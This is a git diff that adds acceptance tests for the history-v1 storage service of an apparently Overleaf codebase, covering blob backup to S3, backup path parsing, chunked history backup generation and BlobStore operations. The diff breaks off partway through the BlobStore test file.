b/services/history-v1/test/acceptance/js/storage/backupBlob.test.mjs new file mode 100644 index 0000000..73ead77 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backupBlob.test.mjs @@ -0,0 +1,278 @@ +import { expect } from 'chai' +import Crypto from 'node:crypto' +import Stream from 'node:stream' +import { + makeBlobForFile, + getStringLengthOfFile, + makeProjectKey, + BlobStore, +} from '../../../../storage/lib/blob_store/index.js' +import { Blob } from 'overleaf-editor-core' +import { insertBlob } from '../../../../storage/lib/blob_store/mongo.js' +import { + backupBlob, + downloadBlobToDir, +} from '../../../../storage/lib/backupBlob.mjs' +import fs from 'node:fs' +import path from 'node:path' +import os from 'node:os' +import fsExtra from 'fs-extra' +import { backedUpBlobs, projects } from '../../../../storage/lib/mongodb.js' +import { Binary, ObjectId } from 'mongodb' +import { + backupPersistor, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { WritableBuffer } from '@overleaf/stream-utils' +import cleanup from './support/cleanup.js' + +async function listS3BucketRaw(bucket) { + const client = backupPersistor._getClientForBucket(bucket) + return await client.listObjectsV2({ Bucket: bucket }).promise() +} + +async function listS3Bucket(bucket, wantStorageClass) { + const response = await listS3BucketRaw(bucket) + for (const object of response.Contents || []) { + if (wantStorageClass) { + expect(object).to.have.property('StorageClass', wantStorageClass) + } + } + + return (response.Contents || []).map(item => item.Key || '') +} + +describe('backupBlob', function () { + let filePath + let tmpDir + + before(async function () { + tmpDir = await fs.promises.mkdtemp(path.join(os.tmpdir(), 'temp-test-')) + filePath = path.join(tmpDir, 'test.txt') + await fs.promises.writeFile(filePath, 'test') + }) + + after(async function () { + try { + fsExtra.remove(tmpDir) + } catch (err) { + if (err.code !== 'ENOENT') { + console.log('failed to delete temporary file') + } + } + }) + + beforeEach(cleanup.everything) + + describe('when the blob is already backed up', function () { + let blob + let historyId + + beforeEach(async function () { + blob = await makeBlobForFile(filePath) + historyId = 'abc123def456abc789def123' + await backedUpBlobs.updateOne( + { + _id: new ObjectId(historyId), + }, + { + $set: { blobs: [new Binary(Buffer.from(blob.getHash(), 'hex'))] }, + }, + { upsert: true } + ) + await backupBlob(historyId, blob, filePath) + }) + + it('does not upload the blob', async function () { + const bucketContents = await listS3Bucket(projectBlobsBucket) + expect(bucketContents).to.have.lengthOf(0) + }) + }) + + describe('when the historyId is for a postgres project', function () { + let blob + let historyId + const projectId = new ObjectId() + + beforeEach(async function () { + blob = await makeBlobForFile(filePath) + historyId = '123' + await projects.insertOne({ + _id: projectId, + overleaf: { history: { id: 123 } }, + }) + await backupBlob(historyId, blob, filePath) + }) + + afterEach(async function () { + await projects.deleteOne({ + _id: projectId, + }) + }) + + it('uploads the blob to the backup', async function () { + const bucketContents = await listS3Bucket(projectBlobsBucket) + expect(bucketContents).to.have.lengthOf(1) + }) + it('stores the backup', async function () { + expect( + await backedUpBlobs.findOne({ + _id: projectId, + blobs: { + $elemMatch: { $eq: new Binary(Buffer.from(blob.getHash(), 'hex')) }, + }, + }) + ).to.exist + }) + }) + + describe('when the blob is not already backed up', function () { + let blob + let historyId + beforeEach(async function () { + blob = await makeBlobForFile(filePath) + historyId = 'abc123def456abc789def123' + await backupBlob(historyId, blob, filePath) + }) + + it('uploads the blob to the backup', async function () { + const bucketContents = await listS3Bucket(projectBlobsBucket) + expect(bucketContents).to.have.lengthOf(1) + }) + it('stores the backup', async function () { + expect( + await backedUpBlobs.findOne({ + _id: new ObjectId(historyId), + blobs: { + $elemMatch: { $eq: new Binary(Buffer.from(blob.getHash(), 'hex')) }, + }, + }) + ).to.exist + }) + }) + + const cases = [ + { + name: 'text file', + content: Buffer.from('x'.repeat(1000)), + storedSize: 29, // zlib.gzipSync(content).byteLength + }, + { + name: 'large text file', + // 'ä' is a 2-byte utf-8 character -> 4MB. + content: Buffer.from('ü'.repeat(2 * 1024 * 1024)), + storedSize: 4101, // zlib.gzipSync(content).byteLength + }, + { + name: 'binary file', + content: Buffer.from([0, 1, 2, 3]), + storedSize: 4, + }, + { + name: 'large binary file', + content: Crypto.randomBytes(10 * 1024 * 1024), + storedSize: 10 * 1024 * 1024, + }, + ] + for (const { name, content, storedSize } of cases) { + describe(name, function () { + let blob + let key + let historyId + beforeEach(async function () { + historyId = 'abc123def456abc789def123' + await fs.promises.writeFile(filePath, content) + blob = await makeBlobForFile(filePath) + blob.setStringLength( + await getStringLengthOfFile(blob.getByteLength(), filePath) + ) + key = makeProjectKey(historyId, blob.getHash()) + await backupBlob(historyId, blob, filePath) + }) + it('should upload the blob', async function () { + const response = await listS3BucketRaw(projectBlobsBucket) + expect(response.Contents).to.have.length(1) + expect(response.Contents[0].Key).to.equal(key) + expect(response.Contents[0].Size).to.equal(storedSize) + }) + it('should read back the same content', async function () { + const buf = new WritableBuffer() + await Stream.promises.pipeline( + await backupPersistor.getObjectStream(projectBlobsBucket, key, { + autoGunzip: true, + }), + buf + ) + expect(buf.getContents()).to.deep.equal(content) + }) + }) + } +}) + +describe('downloadBlobToDir', function () { + let tmpDirDownload + const historyId = 'abc123def456abc789def123' + + before(async function () { + tmpDirDownload = await fs.promises.mkdtemp( + path.join(os.tmpdir(), 'downloadBlobTest-') + ) + }) + + after(async function () { + await fs.promises.rm(tmpDirDownload, { recursive: true, force: true }) + }) + + it('should download the blob successfully', async function () { + const data = 'hello world' + // Use putString instead of writing a source file and using makeBlobForFile + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putString(data) + + // Now call downloadBlobToDir which will use blobStore.getStream internally + const downloadedFilePath = await downloadBlobToDir( + historyId, + blob, + tmpDirDownload + ) + const contents = await fs.promises.readFile(downloadedFilePath, 'utf8') + expect(contents).to.equal(data) + }) + + it('should delete the file on error (if file already exists)', async function () { + const data = 'data that will not be written' + const blobStore = new BlobStore(historyId) + const blob = await blobStore.putString(data) + const hash = blob.getHash() + const fileName = `${historyId}-${hash}` + + // Pre-create the destination file to trigger a failure due to an existing file + const downloadedFilePath = path.join(tmpDirDownload, fileName) + await fs.promises.writeFile(downloadedFilePath, 'preexisting content') + + try { + await downloadBlobToDir(historyId, blob, tmpDirDownload) + expect.fail('should not reach here') + } catch (error) { + // Check that the file was deleted + await expect(fs.promises.access(downloadedFilePath)).to.be.rejected + } + }) + + it('should not leave an empty file if download fails', async function () { + // Create a blob with a hash that does not exist in the blob store + const hash = '0000000000000000000000000000000000000000' + const blob = new Blob(hash, 12, 12) + await insertBlob(historyId, blob) + const fileName = `${historyId}-${hash}` + try { + await downloadBlobToDir(historyId, blob, tmpDirDownload) + expect.fail('should not reach here') + } catch (error) { + expect(error).to.be.instanceOf(Blob.NotFoundError) + const downloadedFilePath = path.join(tmpDirDownload, fileName) + // Check that the file was deleted + await expect(fs.promises.access(downloadedFilePath)).to.be.rejected + } + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/backupPersistor.test.mjs b/services/history-v1/test/acceptance/js/storage/backupPersistor.test.mjs new file mode 100644 index 0000000..e9aedac --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backupPersistor.test.mjs @@ -0,0 +1,51 @@ +import { + pathToProjectFolder, + projectBlobsBucket, +} from '../../../../storage/lib/backupPersistor.mjs' +import { expect } from 'chai' + +describe('backupPersistor', () => { + describe('pathToProjectFolder', () => { + it('handles postgres and mongo-ids', function () { + expect(pathToProjectFolder(projectBlobsBucket, '100/000/000')).to.equal( + '100/000/000/' + ) + expect(pathToProjectFolder(projectBlobsBucket, '100/000/000/')).to.equal( + '100/000/000/' + ) + expect( + pathToProjectFolder(projectBlobsBucket, '100/000/000/foo') + ).to.equal('100/000/000/') + expect(pathToProjectFolder(projectBlobsBucket, '210/000/000')).to.equal( + '210/000/000/' + ) + expect(pathToProjectFolder(projectBlobsBucket, '987/654/321')).to.equal( + '987/654/321/' + ) + expect(pathToProjectFolder(projectBlobsBucket, '987/654/3219')).to.equal( + '987/654/3219/' + ) + expect( + pathToProjectFolder(projectBlobsBucket, 'fed/cba/987654321000000000') + ).to.equal('fed/cba/987654321000000000/') + expect( + pathToProjectFolder(projectBlobsBucket, 'fed/cba/987654321000000000/') + ).to.equal('fed/cba/987654321000000000/') + expect( + pathToProjectFolder( + projectBlobsBucket, + 'fed/cba/987654321000000000/foo' + ) + ).to.equal('fed/cba/987654321000000000/') + }) + + it('rejects invalid input', function () { + const cases = ['', '//', '1/2/3', '123/456/78', 'abc/d/e', 'abc/def/012'] + for (const key of cases) { + expect(() => { + pathToProjectFolder(projectBlobsBucket, key) + }, key).to.throw('invalid project folder') + } + }) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/backup_generator.test.mjs b/services/history-v1/test/acceptance/js/storage/backup_generator.test.mjs new file mode 100644 index 0000000..3c0e8f1 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/backup_generator.test.mjs @@ -0,0 +1,338 @@ +import { expect } from 'chai' +import { backupGenerator } from '../../../../storage/lib/backupGenerator.mjs' +import ChunkStore from '../../../../storage/lib/chunk_store/index.js' +import persistChanges from '../../../../storage/lib/persist_changes.js' +import { + Change, + Operation, + TextOperation, + AddFileOperation, + File, +} from 'overleaf-editor-core' +import { ObjectId } from 'mongodb' +import testFiles from './support/test_files.js' +import { BlobStore } from '../../../../storage/lib/blob_store/index.js' +import fs from 'node:fs' +import blobHash from '../../../../storage/lib/blob_hash.js' + +const scenarios = [ + { + description: 'Postgres history', + createProject: ChunkStore.initializeProject, + }, + { + description: 'Mongo history', + createProject: () => + ChunkStore.initializeProject(new ObjectId().toString()), + }, +] + +for (const scenario of scenarios) { + describe(`backupGenerator with ${scenario.description}`, function () { + let projectId + let limitsToPersistImmediately + let blobStore + const NUM_CHUNKS = 3 + const FINAL_VERSION = 24 + + before(function () { + // used to provide a limit which forces us to persist all of the changes + const farFuture = new Date() + farFuture.setTime(farFuture.getTime() + 7 * 24 * 3600 * 1000) + limitsToPersistImmediately = { + minChangeTimestamp: farFuture, + maxChangeTimestamp: farFuture, + maxChunkChanges: 10, + } + }) + + beforeEach(async function () { + projectId = await scenario.createProject() + blobStore = new BlobStore(projectId) + + // Add test files first + await Promise.all([ + blobStore.putFile(testFiles.path('graph.png')), + blobStore.putFile(testFiles.path('non_bmp.txt')), + ]) + + const HELLO_TXT = fs.readFileSync(testFiles.path('hello.txt')).toString() + + // Create a sample project history for testing, with a chunk size of 10 + // + // 1. Add a text file main.tex with contents from hello.txt + // 2. Add a binary file image.png with contents from graph.png + // 3. Add a text file other.tex with empty contents + // 4. Apply 10 changes that append characters to the end of other.tex giving 'aaaaaaaaaa' + // In applying the 10 changes we hit the first chunk boundary and create a new chunk. + // The first chunk contains the 3 file operations and 7 changes + // to other.tex which is now "aaaaaaa" (7 characters) + // snapshot: {} + // changes: add main.tex, add image.png, add other.tex, 7 changes to other.tex + // The second chunk has a snapshot with the existing files + // snapshot: main.tex, image.png, other.tex="aaaaaaa" (7 characters) + // changes: 3 changes to other.tex, each appending 'a' + // 5. Now we add a new file non_bmp.txt with non-BMP characters + // 6. Finally we apply 10 more changes to other.tex, each appending another 'a' to give 'aaaaaaaaaaaaaaaaaaaa' (20 characters) + // In applying the 10 changes we hit another chunk boundary and create a third chunk. + // The final state of the second chunk is + // snapshot: main.tex, image.png, other.tex="aaaaaaa" (7 characters) + // changes: + // 3 changes to other.tex, each appending 'a' + // add file non_bmp.txt, + // 6 changes to other.tex, each appending 'a' + // The third chunk will contain the last 4 changes to other.tex + // snapshot: main.tex, image.png, non_bmp.tex, other.tex="aaaaaaaaaaaaaaaa" (16 characters) + // changes: 4 changes to other.tex, each appending 'a' + + const textChange = new Change( + [new AddFileOperation('main.tex', File.fromString(HELLO_TXT))], + new Date(), + [] + ) + const binaryChange = new Change( + [ + new AddFileOperation( + 'image.png', + File.fromHash(testFiles.GRAPH_PNG_HASH) + ), + ], + new Date(), + [] + ) + const otherChange = new Change( + [new AddFileOperation('other.tex', File.fromString(''))], + new Date(), + [] + ) + // now append characters to the end of the contents of other.tex + const otherEdits = Array.from( + { length: 10 }, + (_, i) => + new Change( + [ + Operation.editFile( + 'other.tex', + TextOperation.fromJSON({ + textOperation: i === 0 ? ['a'] : [i, 'a'], + }) + ), + ], + new Date(), + [] + ) + ) + const newFile = new Change( + [ + new AddFileOperation( + 'non_bmp.txt', + File.fromHash(testFiles.NON_BMP_TXT_HASH) + ), + ], + new Date(), + [] + ) + const moreOtherEdits = Array.from( + { length: 10 }, + (_, i) => + new Change( + [ + Operation.editFile( + 'other.tex', + TextOperation.fromJSON({ textOperation: [i + 10, 'a'] }) + ), + ], + new Date(), + [] + ) + ) + + await persistChanges( + projectId, + [ + textChange, + binaryChange, + otherChange, + ...otherEdits, + newFile, + ...moreOtherEdits, + ], + limitsToPersistImmediately, + 0 + ) + }) + + it('should yield correct data for an initial backup', async function () { + const results = [] + for await (const result of backupGenerator(projectId)) { + results.push(result) + } + + // There should be 3 chunks + expect(results).to.have.length(NUM_CHUNKS) + + // First chunk + expect(results[0].chunkRecord.startVersion).to.equal(0) + expect(results[0].chunkRecord.endVersion).to.equal(10) + expect(results[0].blobsToBackup).to.have.deep.members([ + { + hash: testFiles.HELLO_TXT_HASH, + byteLength: testFiles.HELLO_TXT_BYTE_LENGTH, + stringLength: testFiles.HELLO_TXT_UTF8_LENGTH, + }, + { + hash: testFiles.GRAPH_PNG_HASH, + byteLength: testFiles.GRAPH_PNG_BYTE_LENGTH, + stringLength: null, + }, + { + hash: File.EMPTY_FILE_HASH, + byteLength: 0, + stringLength: 0, + }, + ]) + + // Second chunk + expect(results[1].chunkRecord.startVersion).to.equal(10) + expect(results[1].chunkRecord.endVersion).to.equal(20) + expect(results[1].blobsToBackup).to.have.deep.members([ + { + hash: blobHash.fromString('a'.repeat(7)), + byteLength: 7, + stringLength: 7, + }, + { + hash: testFiles.NON_BMP_TXT_HASH, + byteLength: testFiles.NON_BMP_TXT_BYTE_LENGTH, + stringLength: null, + }, + ]) + + // Third chunk + expect(results[2].chunkRecord.startVersion).to.equal(20) + expect(results[2].chunkRecord.endVersion).to.equal(24) + expect(results[2].blobsToBackup).to.have.deep.members([ + { + hash: blobHash.fromString('a'.repeat(16)), + byteLength: 16, + stringLength: 16, + }, + ]) + }) + + for ( + let lastBackedUpVersion = 0; + lastBackedUpVersion <= FINAL_VERSION; + lastBackedUpVersion++ + ) { + it(`should yield the expected data when the last backed up version was ${lastBackedUpVersion}`, async function () { + const results = [] + for await (const result of backupGenerator( + projectId, + lastBackedUpVersion + )) { + results.push(result) + } + + const chunkDefinitions = [ + { + chunk: { startVersion: 0, endVersion: 10 }, + blobs: [ + { + version: 1, + blob: { + hash: testFiles.HELLO_TXT_HASH, + byteLength: testFiles.HELLO_TXT_BYTE_LENGTH, + stringLength: testFiles.HELLO_TXT_UTF8_LENGTH, + }, + }, + { + version: 2, + blob: { + hash: testFiles.GRAPH_PNG_HASH, + byteLength: testFiles.GRAPH_PNG_BYTE_LENGTH, + stringLength: null, + }, + }, + { + version: 3, + blob: { + hash: File.EMPTY_FILE_HASH, + byteLength: 0, + stringLength: 0, + }, + }, + ], + }, + { + chunk: { startVersion: 10, endVersion: 20 }, + blobs: [ + { + version: 11, + blob: { + hash: blobHash.fromString('a'.repeat(7)), + byteLength: 7, + stringLength: 7, + }, + }, + { + version: 14, + blob: { + hash: testFiles.NON_BMP_TXT_HASH, + byteLength: testFiles.NON_BMP_TXT_BYTE_LENGTH, + stringLength: null, + }, + }, + ], + }, + { + chunk: { startVersion: 20, endVersion: 24 }, + blobs: [ + { + version: 21, + blob: { + hash: blobHash.fromString('a'.repeat(16)), + byteLength: 16, + stringLength: 16, + }, + }, + ], + }, + ] + + const expectedChunks = chunkDefinitions + .filter(({ chunk }) => lastBackedUpVersion < chunk.endVersion) + .map(({ chunk }) => chunk) + const expectedBlobs = chunkDefinitions + .filter(({ chunk }) => lastBackedUpVersion < chunk.endVersion) + .map(({ blobs }) => + blobs + .filter(({ version }) => lastBackedUpVersion < version) + .map(({ blob }) => blob) + ) + + expect(results).to.have.length(expectedChunks.length) + expect(results).to.have.length(expectedBlobs.length) + + results.forEach((result, i) => { + expect(result.chunkRecord).to.deep.include(expectedChunks[i]) + expect(result.blobsToBackup).to.have.deep.members(expectedBlobs[i]) + }) + }) + } + + it(`should not back up blobs that have already been backed up in previous chunks`, async function () { + const results = [] + for await (const result of backupGenerator(projectId)) { + results.push(result) + } + const seenBlobs = new Set() + for (const result of results) { + for (const blob of result.blobsToBackup) { + expect(seenBlobs).to.not.include(blob.hash) + seenBlobs.add(blob.hash) + } + } + }) + }) +} diff --git a/services/history-v1/test/acceptance/js/storage/batch_blob_store.test.js b/services/history-v1/test/acceptance/js/storage/batch_blob_store.test.js new file mode 100644 index 0000000..645ea59 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/batch_blob_store.test.js @@ -0,0 +1,52 @@ +'use strict' + +const { expect } = require('chai') + +const cleanup = require('./support/cleanup') +const testFiles = require('./support/test_files') + +const core = require('overleaf-editor-core') +const File = core.File + +const storage = require('../../../../storage') +const BatchBlobStore = storage.BatchBlobStore +const BlobStore = storage.BlobStore + +const projectId = '123' +const blobStore = new BlobStore(projectId) +const batchBlobStore = new BatchBlobStore(blobStore) + +describe('BatchBlobStore', function () { + beforeEach(cleanup.everything) + + it('can preload and batch getBlob calls', async function () { + // Add some test files + await Promise.all([ + blobStore.putFile(testFiles.path('graph.png')), + blobStore.putFile(testFiles.path('hello.txt')), + ]) + + // Cache some blobs (one that exists and another that doesn't) + await batchBlobStore.preload([ + testFiles.GRAPH_PNG_HASH, + File.EMPTY_FILE_HASH, // not found + ]) + expect(batchBlobStore.blobs.size).to.equal(1) + + const [cached, notCachedExists, notCachedNotExists, duplicate] = + await Promise.all([ + batchBlobStore.getBlob(testFiles.GRAPH_PNG_HASH), // cached + batchBlobStore.getBlob(testFiles.HELLO_TXT_HASH), // not cached; exists + batchBlobStore.getBlob(File.EMPTY_FILE_HASH), // not cached; not exists + batchBlobStore.getBlob(testFiles.GRAPH_PNG_HASH), // duplicate + ]) + + expect(cached.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + expect(notCachedExists.getHash()).to.equal(testFiles.HELLO_TXT_HASH) + expect(notCachedNotExists).to.be.undefined + expect(duplicate.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + + // We should get exactly the object from the cache. + expect(cached).to.equal(batchBlobStore.blobs.get(testFiles.GRAPH_PNG_HASH)) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_hash.test.js b/services/history-v1/test/acceptance/js/storage/blob_hash.test.js new file mode 100644 index 0000000..77e4cc3 --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_hash.test.js @@ -0,0 +1,15 @@ +'use strict' + +const { expect } = require('chai') +const storage = require('../../../../storage') +const blobHash = storage.blobHash + +describe('blobHash', function () { + it('can hash non-ASCII strings', function () { + // checked with git hash-object + const testString = 'å\n' + const testHash = 'aad321caf77ca6c5ab09e6c638c237705f93b001' + + expect(blobHash.fromString(testString)).to.equal(testHash) + }) +}) diff --git a/services/history-v1/test/acceptance/js/storage/blob_store.test.js b/services/history-v1/test/acceptance/js/storage/blob_store.test.js new file mode 100644 index 0000000..531b42e --- /dev/null +++ b/services/history-v1/test/acceptance/js/storage/blob_store.test.js @@ -0,0 +1,580 @@ +'use strict' + +const _ = require('lodash') +const { expect } = require('chai') +const config = require('config') +const fs = require('node:fs') +const path = require('node:path') +const { Readable } = require('node:stream') +const temp = require('temp').track() +const { promisify } = require('node:util') + +const cleanup = require('./support/cleanup') +const testFiles = require('./support/test_files') + +const { Blob, TextOperation } = require('overleaf-editor-core') +const { + BlobStore, + loadGlobalBlobs, + mongodb, + persistor, + streams, +} = require('../../../../storage') +const mongoBackend = require('../../../../storage/lib/blob_store/mongo') +const postgresBackend = require('../../../../storage/lib/blob_store/postgres') +const { getProjectBlobsBatch } = require('../../../../storage/lib/blob_store') + +const mkTmpDir = promisify(temp.mkdir) + +describe('BlobStore', function () { + const helloWorldString = 'Hello World' + const helloWorldHash = '5e1c309dae7f45e0f39b1bf3ac3cd9db12e7d689' + const globalBlobString = 'a' + const globalBlobHash = testFiles.STRING_A_HASH + const demotedBlobString = 'ab' + const demotedBlobHash = testFiles.STRING_AB_HASH + + beforeEach(cleanup.everything) + + beforeEach('install a global blob', async function () { + await mongodb.globalBlobs.insertOne({ + _id: globalBlobHash, + byteLength: globalBlobString.length, + stringLength: globalBlobString.length, + }) + await mongodb.globalBlobs.insertOne({ + _id: demotedBlobHash, + byteLength: demotedBlobString.length, + stringLength: demotedBlobString.length, + demoted: true, + }) + const bucket = config.get('blobStore.globalBucket') + for (const { key, content } of [ + { + key: '2e/65/efe2a145dda7ee51d1741299f848e5bf752e', + content: globalBlobString, + }, + { + key: '9a/e9/e86b7bd6cb1472d9373702d8249973da0832', + content: demotedBlobString, + }, + ]) { + const stream = Readable.from([content]) + await persistor.sendStream(bucket, key, stream) + } + await loadGlobalBlobs() + }) + + const scenarios = [ + { + description: 'Postgres backend', + projectId: '123', + projectId2: '456', + backend: postgresBackend, + }, + { + description: 'Mongo backend', + projectId: '63725f84b2bdd246ec8c0000', + projectId2: '63725f84b2bdd246ec8c1234', + backend: mongoBackend, + }, + ] + for (const scenario of scenarios) { + describe(scenario.description, function () { + const blobStore = new BlobStore(scenario.projectId) + const blobStore2 = new BlobStore(scenario.projectId2) + + beforeEach('initialize the blob stores', async function () { + await blobStore.initialize() + await blobStore2.initialize() + }) + + it('can initialize a project again without throwing an error', async function () { + await blobStore.initialize() + await blobStore2.initialize() + }) + + it('can store and fetch string content', async function () { + function checkBlob(blob) { + expect(blob.getHash()).to.equal(helloWorldHash) + expect(blob.getByteLength()).to.equal(helloWorldString.length) + expect(blob.getStringLength()).to.equal(helloWorldString.length) + } + + const insertedBlob = await blobStore.putString(helloWorldString) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(helloWorldHash) + checkBlob(fetchedBlob) + const content = await blobStore.getString(helloWorldHash) + expect(content).to.equal(helloWorldString) + }) + + it('can store and fetch utf-8 files', async function () { + const testFile = 'hello.txt' + + function checkBlob(blob) { + expect(blob.getHash()).to.equal(testFiles.HELLO_TXT_HASH) + expect(blob.getByteLength()).to.equal(testFiles.HELLO_TXT_BYTE_LENGTH) + expect(blob.getStringLength()).to.equal( + testFiles.HELLO_TXT_UTF8_LENGTH + ) + } + + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(testFiles.HELLO_TXT_HASH) + checkBlob(fetchedBlob) + const content = await blobStore.getString(testFiles.HELLO_TXT_HASH) + expect(content).to.equal('Olá mundo\n') + }) + + it('can store and fetch a large text file', async function () { + const testString = _.repeat('a', 1000000) + const testHash = 'de1fbf0c2f34f67f01f355f31ed0cf7319643c5e' + + function checkBlob(blob) { + expect(blob.getHash()).to.equal(testHash) + expect(blob.getByteLength()).to.equal(testString.length) + expect(blob.getStringLength()).to.equal(testString.length) + } + + const dir = await mkTmpDir('blobStore') + const pathname = path.join(dir, 'a.txt') + fs.writeFileSync(pathname, testString) + const insertedBlob = await blobStore.putFile(pathname) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(testHash) + checkBlob(fetchedBlob) + const content = await blobStore.getString(testHash) + expect(content).to.equal(testString) + }) + + it('stores overlarge text files as binary', async function () { + const testString = _.repeat('a', TextOperation.MAX_STRING_LENGTH + 1) + const dir = await mkTmpDir('blobStore') + const pathname = path.join(dir, 'a.txt') + fs.writeFileSync(pathname, testString) + const blob = await blobStore.putFile(pathname) + expect(blob.getByteLength()).to.equal(testString.length) + expect(blob.getStringLength()).not.to.exist + }) + + it('can store and fetch binary files', async function () { + const testFile = 'graph.png' + + function checkBlob(blob) { + expect(blob.getHash()).to.equal(testFiles.GRAPH_PNG_HASH) + expect(blob.getByteLength()).to.equal(testFiles.GRAPH_PNG_BYTE_LENGTH) + expect(blob.getStringLength()).to.be.null + } + + const insertedBlob = await blobStore.putFile(testFiles.path(testFile)) + checkBlob(insertedBlob) + const fetchedBlob = await blobStore.getBlob(testFiles.GRAPH_PNG_HASH) + checkBlob(fetchedBlob) + const stream = await blobStore.getStream(testFiles.GRAPH_PNG_HASH) + const buffer = await streams.readStreamToBuffer(stream) + expect(buffer.length).to.equal(testFiles.GRAPH_PNG_BYTE_LENGTH) + expect(buffer.toString('hex', 0, 8)).to.equal( + testFiles.PNG_MAGIC_NUMBER + ) + }) + + const missingHash = 'deadbeef00000000000000000000000000000000' + + it('fails to get a missing key as a string', async function () { + try { + await blobStore.getString(missingHash) + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + expect(err.hash).to.equal(missingHash) + return + } + expect.fail('expected NotFoundError') + }) + + it('fails to get a missing key as a stream', async function () { + try { + await blobStore.getStream(missingHash) + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + return + } + expect.fail('expected NotFoundError') + }) + + it('reads invalid utf-8 as utf-8', async function () { + // We shouldn't do this, but we need to know what happens if we do. + // TODO: We should throw an error instead, but this function doesn't have + // an easy way of checking the content type. + const testFile = 'graph.png' + await blobStore.putFile(testFiles.path(testFile)) + const content = await blobStore.getString(testFiles.GRAPH_PNG_HASH) + expect(content.length).to.equal(12902) + }) + + it('checks for non BMP characters', async function () { + const testFile = 'non_bmp.txt' + await blobStore.putFile(testFiles.path(testFile)) + const blob = await blobStore.getBlob(testFiles.NON_BMP_TXT_HASH) + expect(blob.getStringLength()).to.be.null + expect(blob.getByteLength()).to.equal(testFiles.NON_BMP_TXT_BYTE_LENGTH) + }) + + it('can fetch metadata for multiple blobs at once', async function () { + await blobStore.putFile(testFiles.path('graph.png')) + const blobs = await blobStore.getBlobs([ + testFiles.GRAPH_PNG_HASH, + testFiles.HELLO_TXT_HASH, // not found + testFiles.GRAPH_PNG_HASH, // requested twice + ]) + const hashes = blobs.map(blob => blob.getHash()) + expect(hashes).to.deep.equal([testFiles.GRAPH_PNG_HASH]) + }) + + describe('multiple blobs in the same project', async function () { + beforeEach(async function () { + await blobStore.putString(helloWorldString) + await blobStore.putFile(testFiles.path('graph.png')) + await blobStore.putFile(testFiles.path('hello.txt')) + }) + + it('getBlob() returns each blob', async function () { + const helloBlob = await blobStore.getBlob(testFiles.HELLO_TXT_HASH) + const graphBlob = await blobStore.getBlob(testFiles.GRAPH_PNG_HASH) + const helloWorldBlob = await blobStore.getBlob(helloWorldHash) + expect(helloBlob.hash).to.equal(testFiles.HELLO_TXT_HASH) + expect(graphBlob.hash).to.equal(testFiles.GRAPH_PNG_HASH) + expect(helloWorldBlob.hash).to.equal(helloWorldHash) + }) + + it('getBlobs() returns all blobs', async function () { + const blobs = await blobStore.getBlobs([ + testFiles.HELLO_TXT_HASH, + testFiles.GRAPH_PNG_HASH, + testFiles.NON_BMP_TXT_HASH, // not in blob store + ]) + const actualHashes = blobs.map(blob => blob.hash) + expect(actualHashes).to.have.members([ + testFiles.HELLO_TXT_HASH, + testFiles.GRAPH_PNG_HASH, + ]) + }) + + it('getProjectBlobs() returns all blobs in the project', async function () { + const blobs = await blobStore.getProjectBlobs() + const hashes = blobs.map(blob => blob.getHash()) + expect(hashes).to.have.members([ + testFiles.HELLO_TXT_HASH, + testFiles.GRAPH_PNG_HASH, + helloWorldHash, + ]) + }) + }) + + describe('two blob stores on different projects', function () { + beforeEach(async function () { + await blobStore.putString(helloWorldString) + await blobStore2.putFile(testFiles.path('graph.png')) + }) + + it('separates blobs when calling getBlob()', async function () { + const blobFromStore1 = await blobStore.getBlob(helloWorldHash) + const blobFromStore2 = await blobStore2.getBlob(helloWorldHash) + expect(blobFromStore1).to.exist + expect(blobFromStore2).not.to.exist + }) + + it('separates blobs when calling getBlobs()', async function () { + const blobsFromStore1 = await blobStore.getBlobs([ + helloWorldHash, + testFiles.GRAPH_PNG_HASH, + ]) + const blobsFromStore2 = await blobStore2.getBlobs([ + helloWorldHash, + testFiles.GRAPH_PNG_HASH, + ]) + expect(blobsFromStore1.map(blob => blob.getHash())).to.deep.equal([ + helloWorldHash, + ]) + expect(blobsFromStore2.map(blob => blob.getHash())).to.deep.equal([ + testFiles.GRAPH_PNG_HASH, + ]) + }) + + it('separates blobs when calling getStream()', async function () { + await blobStore2.getStream(testFiles.GRAPH_PNG_HASH) + try { + await blobStore.getStream(testFiles.GRAPH_PNG_HASH) + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + return + } + expect.fail( + 'expected Blob.NotFoundError when calling blobStore.getStream()' + ) + }) + + it('separates blobs when calling getString()', async function () { + const content = await blobStore.getString(helloWorldHash) + expect(content).to.equal(helloWorldString) + try { + await blobStore2.getString(helloWorldHash) + } catch (err) { + expect(err).to.be.an.instanceof(Blob.NotFoundError) + return + } + expect.fail( + 'expected Blob.NotFoundError when calling blobStore.getStream()' + ) + }) + + if (scenario.backend !== mongoBackend) { + // mongo backend has its own test for this, covering sharding + it('getProjectBlobsBatch() returns blobs per project', async function () { + const projects = [ + parseInt(scenario.projectId, 10), + parseInt(scenario.projectId2, 10), + ] + const { nBlobs, blobs } = + await postgresBackend.getProjectBlobsBatch(projects) + expect(nBlobs).to.equal(2) + expect(Object.fromEntries(blobs.entries())).to.deep.equal({ + [parseInt(scenario.projectId, 10)]: [ + new Blob(helloWorldHash, 11, 11), + ], + [parseInt(scenario.projectId2, 10)]: [ + new Blob( + testFiles.GRAPH_PNG_HASH, + testFiles.GRAPH_PNG_BYTE_LENGTH, + null + ), + ], + }) + }) + } + }) + + describe('a global blob', function () { + it('is available through getBlob()', async function () { + const blob = await blobStore.getBlob(globalBlobHash) + expect(blob.getHash()).to.equal(globalBlobHash) + }) + + it('is available through getBlobs()', async function () { 